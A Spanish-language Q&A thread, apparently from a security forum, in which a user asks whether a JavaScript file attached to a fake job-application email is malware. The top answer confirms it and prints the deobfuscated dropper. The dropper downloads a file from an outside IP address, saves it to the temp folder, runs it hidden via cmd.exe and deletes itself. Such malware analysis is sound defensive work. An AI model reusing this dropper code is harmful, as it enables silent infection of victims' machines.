¿Es este un virus Javascript?

Navega tus respuestas
7

Así que recibí un correo electrónico aleatorio diciendo esto. Parece muy automatizado:

  

"¿Cómo están las cosas?   Estuve visitando su sitio web el 4/9/2016 y estoy muy interesado.   Actualmente estoy buscando trabajo ya sea a tiempo completo o como pasante para obtener experiencia en el campo.   Por favor revise mi currículum y déjeme saber lo que piensa.

Luego se adjunta un archivo javascript. Lo escanee en hallazgo virustotal solo 1/55 enlace

He abierto el archivo para ver el texto y copiarlo y pegarlo en este archivo de volcado, ya que es bastante largo. enlace

¿Cualquier persona familiarizada con javascript puede confirmar que es un virus o no?

¡Gracias!

    
pregunta 2000mroliver 10.04.2016 - 08:27
fuente

2 respuestas

7

Ciertamente es un malware. Utiliza ActiveX para abrir un shell con cmd.exe. Esta es la versión despoblada: 

function zQlMdib() {
    var asupcI = new ActiveXObject("MSXML2.XMLHTTP");
    asupcI['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    var OnvPPuGD = WScript['ScriptFullName'];
    asupcI['send']();
    if (asupcI['Status'] == 200) {
        var Bz = new ActiveXObject("Scripting.FileSystemObject");
        var mEadcyX = new ActiveXObject("ADODB.Stream");
        var zpfPsOb = Bz['GetSpecialFolder'](2) + '\' + Bz['GetTempName']();
        mEadcyX['Open']();
        mEadcyX['Type'] = 1;
        var oMod = new ActiveXObject("WScript.Shell");
        mEadcyX['Write'](asupcI['ResponseBody']);
        mEadcyX['Position'] = 0;
        mEadcyX['SaveToFile'](zpfPsOb);
        mEadcyX['Close']();
        oMod['run']('cmd.exe /c ' + zpfPsOb, 0);
    }
    Bz['deleteFile'](OnvPPuGD);
}

Aquí está el análisis de la carga útil en Malwr:

enlace

    
respondido por el forest 10.04.2016 - 09:16
fuente
1

Sí, parece un código malicioso. Este tipo de código no está permitido en el contexto de los navegadores. Además, el código es más o menos compatible con Microsoft Internet Explorer y el sistema operativo de Microsoft Windows, ya que otros navegadores no admiten la tecnología ActiveX de Microsoft.

    
respondido por el Mangu Singh Rajpurohit 11.04.2016 - 05:43
fuente

Lea otras preguntas en las etiquetas

¿Es débil el cifrado AES 128 para un tamaño de carga útil muy pequeño? HIDS - Elegir entre OSSEC regular o la horquilla Wazuh